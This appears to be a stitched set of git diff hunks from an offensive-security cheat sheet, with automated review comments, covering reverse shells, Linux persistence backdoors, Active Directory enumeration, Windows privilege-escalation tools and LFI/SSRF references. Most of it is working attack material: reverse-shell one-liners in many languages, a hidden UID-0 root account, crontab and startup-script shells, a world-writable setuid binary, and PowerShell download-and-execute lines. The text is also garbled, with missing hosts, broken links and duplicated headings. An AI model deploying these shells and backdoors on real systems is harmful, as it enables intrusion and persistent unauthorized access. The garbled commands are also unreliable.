## Basic LFI
* [Kadimus -](
* [LFISuite -](
* [fimap -](
## Basic LFI
### Null byte
### Null byte
:warning: In versions of PHP below 5.3 we can terminate with null byte.

## References
* [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](
* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](
* [GraphQL cheatsheet - DEVHINTS.IO](
* [GraphQL cheatsheet - DEVHINTS.IO](
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](
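Review bot: every link entry in both lists (`[Kadimus -](`, `[LFISuite -](`, `[GraphQL NoSQL Injection Through JSON Types ...](`) ends on an open parenthesis with no URL, so none of them render as links; restore the targets. The `:warning:` null-byte line gives no version beyond "below 5.3" and no source; cite the exact PHP release that closed null-byte path truncation so readers can check it against the version they are looking at. Also, a GraphQL reference list appended directly under an LFI heading reads like two unrelated files merged; confirm the file boundary was not lost in this edit.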

@ -318,6 +318,11 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
or dump the Active Directory and `grep` the content.
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd -o ~/Documents/AD_DUMP/
### PassTheTicket Golden Tickets
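Review bot: the `Get-WmiObject -Class Win32_UserAccount ... | Select Name, Domain, Status, ...` line returns none of the attributes the hunk context names (UserPassword, UnixUserPassword, unicodePwd, msSFU30Password); it only enumerates enabled accounts, so say that this is the account-listing step and that the attribute search happens in the `ldapdomaindump` output the next sentence tells the reader to `grep`. In `ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd -o ~/Documents/AD_DUMP/`, replace the inline password with an obvious placeholder: a literal credential on the command line lands in shell history and process listings, and `MyP@ssW0rd` reads as a real value rather than an example.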
@ -581,6 +586,8 @@ Alternatively you can use the Metasploit module
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
## References
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](
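Review bot: "Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing." is a sentence fragment with no example, link or explanation after it, so its connection to the spraying definition above is unclear; finish the sentence or move it next to the tool's reference entry. The quoted claim that the built-in Administrator (RID 500) cannot be locked out is given without a source; add one, since readers copy statements like this into reports. The two identical `Post-OSCP Series Part 2 - Kerberoasting` reference entries suggest only the URL changed, but neither target is shown here, so confirm the link was updated rather than duplicated.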

# Linux - Persistence
# Linux - Persistence
## Summary
* [Basic reverse shell](#basic-reverse-shell)
* [Add a root user](#add-a-root-user)
* [Suid Binary](#suid-binary)
* [Crontab - Reverse shell](#crontab-reverse-shell)
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
* [Backdooring a startup service](#backdoor-a-startup-service)
* [Backdooring a user startup file](#backdooring-an-user-startup-file)
* [Backdooring a driver](#backdooring-a-driver)
* [Backdooring the APT](#backdooring-the-apt)
* [Backdooring the SSH](#backdooring-the-ssh)
* [Tips](#tips)
* [References](#references)
## Basic reverse shell
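Review bot: three Summary anchors do not match the headings they point at. `[Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)`, `[Backdooring a startup service](#backdoor-a-startup-service)` and `[Backdooring a user startup file](#backdooring-an-user-startup-file)` keep the old slugs, while GitHub derives the anchor from the heading text (lowercase, punctuation dropped, spaces to hyphens), which for the renamed `## Backdooring a user's bash_rc` heading gives `#backdooring-a-users-bash_rc` and for the other two `#backdooring-a-startup-service` and `#backdooring-a-user-startup-file`; update the links so the table of contents works. The `# Linux - Persistence` title also appears twice, which reads like an unresolved rename rather than an intended change.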
@ -8,6 +24,13 @@ ncat --sctp -lvp 4242
ncat --tcp -lvp 4242
## Add a root user
sudo useradd -ou 0 -g 0 john
sudo passwd john
## Suid Binary
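Review bot: `sudo useradd -ou 0 -g 0 john` carries no explanation; add a comment that `-o` (allow a non-unique UID) together with `-u 0 -g 0` creates a second UID 0 entry in `/etc/passwd`, and give the one-line check that confirms the result, which is also the check a defender uses to spot such accounts: `awk -F: '$3 == 0' /etc/passwd`. The `ncat --sctp -lvp 4242` / `ncat --tcp -lvp 4242` listener pair would likewise benefit from a short note on when the SCTP variant is useful, since the rest of the section only ever connects back over TCP.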
@ -19,13 +42,15 @@ chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant
## Crontab (Reverse shell to on port 4242)
## Crontab - Reverse shell
(crontab -l ; echo "@reboot sleep 200 && ncat 4242 -e /bin/bash")|crontab 2> /dev/null
## Backdooring an user's bash_rc (FR/EN Version)
## Backdooring a user's bash_rc
(FR/EN Version)
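Review bot: the crontab entry `@reboot sleep 200 && ncat 4242 -e /bin/bash` has no host argument, so as committed it cannot connect; the target placeholder was lost in the rename. `chmod 4777 $TMPDIR2/croissant` leaves the setuid-root binary world-writable, which beyond the intended effect lets any local user overwrite it and is exactly what a `find / -perm -4000` audit combined with a writable check flags; say why that mode was chosen, since 4755 is what a setuid file normally carries. Finally, `(FR/EN Version)` is stranded on its own line under the renamed `## Backdooring a user's bash_rc` heading, and the old `## Crontab (Reverse shell to on port 4242)` text survives next to the new heading; drop the leftovers.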
@ -48,7 +73,7 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
## Backdooring a user startup file
## Backdooring a user startup file
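Review bot: in `sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart` the escaped `\$RSHELL` inside double quotes inserts the literal string `$RSHELL` as line 4 of the script, not the command stored in the `RSHELL` variable defined on the context line above; that only works if the script itself defines `RSHELL` earlier, which this hunk does not show, so either drop the backslash or show where the variable is written into the file. The `## Backdooring a user startup file` heading also appears twice with identical text, so whatever rename the diff intends is not visible here; confirm the heading actually changed.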

@ -5,6 +5,7 @@
* [Reverse Shell](#reverse-shell)
* [Bash TCP](#bash-tcp)
* [Bash UDP](#bash-udp)
* [Socat](#socat)
* [Perl](#perl)
* [Python](#python)
* [PHP](#php)
@ -50,6 +51,15 @@ Listener:
nc -u -lvp 4242
### Socat
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:
Static socat binary can be found at [](
### Perl
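Review bot: the victim-side `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:` line ends in a bare `tcp:` with no host:port, and the static-binary link `[](` has neither text nor URL, so both lines are unusable as committed; restore the placeholder (for example `tcp:<IP>:4242`, matching the `TCP-L:4242` listener on the line above) and the link target.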
@ -118,12 +128,13 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","
nc -e /bin/sh [IPADDR] [PORT]
nc.traditional -e /bin/bash 4444
### Netcat OpenBsd
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f
### Ncat
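Review bot: both `mkfifo /tmp/f` variants lost the host between `nc` and the port (`nc 1234 >/tmp/f`, `nc 4444 >/tmp/f`), so neither parses as intended; restore the `[IPADDR]` placeholder used two lines up in `nc -e /bin/sh [IPADDR] [PORT]`. Because the old and new lines now differ only in the port number, also confirm the intent was really to change 1234 to 4444 rather than to fix the missing host.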
@ -147,11 +158,11 @@ user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet
### Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
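Review bot: the two `-Command New-Object System.Net.Sockets.TCPClient(...)` variants never assign the client: `New-Object System.Net.Sockets.TCPClient("",4242);$stream = $client.GetStream()` discards the object and then dereferences an undefined `$client`, so `GetStream()` fails immediately. The `-nop -c` variants below are correct because they begin with `$client = New-Object ...`; make the first pair match. The host argument is also empty (`""` / `''`) in all four lines, so the `[IPADDR]` placeholder from the old line should be restored.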
@ -161,21 +172,21 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
### Awk
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
awk 'BEGIN {s = "/inet/tcp/0/>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
### Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
### War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
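Review bot: in the awk line `s = "/inet/tcp/0/>/4242"` a stray `>` survives from the `<IP>` placeholder, which makes the special-file path invalid; it should read `/inet/tcp/0/<IP>/4242`. The `### Java` snippet uses a list literal with `as String[]` and untyped `r` / `p` assignments, which is Groovy syntax rather than Java; label it accordingly. Both of those lines (`exec 5<>/dev/tcp/;`) and the `msfvenom ... LHOST= LPORT=4242` line have also lost their host placeholder.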
@ -185,13 +196,13 @@ strings reverse.war | grep jsp # in order to get the name of the file
Linux only
lua -e "require('socket');require('os');t=socket.tcp();t:connect('','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua -e "require('socket');require('os');t=socket.tcp();t:connect('','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Windows and Linux
lua5.1 -e 'local host, port = "", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
lua5.1 -e 'local host, port = "", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
### NodeJS
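Review bot: in the `lua5.1 -e` loop the `if status == "closed" then break end` test comes after `io.popen(cmd, 'r')`; when the peer closes, `tcp:receive()` returns `nil, "closed"`, so `io.popen(nil)` raises a bad-argument error before the break is reached and the loop exits with a stack trace instead of cleanly. Move the status check directly after `tcp:receive()`. The two `lua -e` lines also call `require('socket')` without keeping the result and then use a global `socket`, which only works with LuaSocket versions that still register that global; assign it (`local socket = require('socket')`) as the lua5.1 variant already does. All four lines have empty host strings (`t:connect('','4242')`, `local host, port = "", 4444`) where a placeholder belongs.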
@ -202,7 +213,7 @@ lua5.1 -e 'local host, port = "", 4444 local socket = require("socket")
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "", function(){
client.connect(4242, "", function(){
@ -213,12 +224,12 @@ lua5.1 -e 'local host, port = "", 4444 local socket = require("socket")
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec('nc -e /bin/sh 4242')
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
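Review bot: the removed pair `-var x = global.process.mainModule.require` / `-x('child_process').exec(...)` is the only form on this page that does not depend on a bare `require` being in scope; if dropping it is deliberate deduplication, say so in the commit message, otherwise keep it alongside the `require('child_process').exec(...)` form. `client.connect(4242, "", function(){` and `exec('nc -e /bin/sh 4242')` have both lost the host; the old lines show the `[IPADDR] [PORT]` placeholders that should remain.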

@ -23,6 +23,10 @@
## Tools
- [PowerSploit's PowerUp](
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](
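Review bot: `DownloadString('')` in the PowerUp line has an empty URL, so the command fetches nothing; restore the script address. The `-Version 2` switch also fails outright on hosts where the PowerShell 2.0 engine has been removed, which is worth a one-line note or a variant without it. Since the same two lines are deleted in the following hunk, this is a move within the tool list and the commit message should say so.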
@ -43,10 +47,6 @@
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
- [PowerSploit's PowerUp](
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks

@ -114,6 +114,7 @@ http://0000::1:3128/ Squid
### Bypass localhost with a domain redirection
```powershell redirect to == localhost
## References
- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](
- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](
- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](
- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](
- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](
- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](
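Review bot: the fence line made of three backticks followed by `powershell redirect to == localhost` runs the info string and the content together, and the `powershell` tag is wrong for what is a plain domain-to-localhost mapping, not a script; put the mapping on its own line inside an untagged fence (or lay it out like the `http://0000::1:3128/ Squid` context line above) and name the redirecting domain, which is missing here. The duplicated `PortSwigger - Web Security Academy Server-side request forgery (SSRF)` entries again show a URL-only change whose targets are not visible; verify the link.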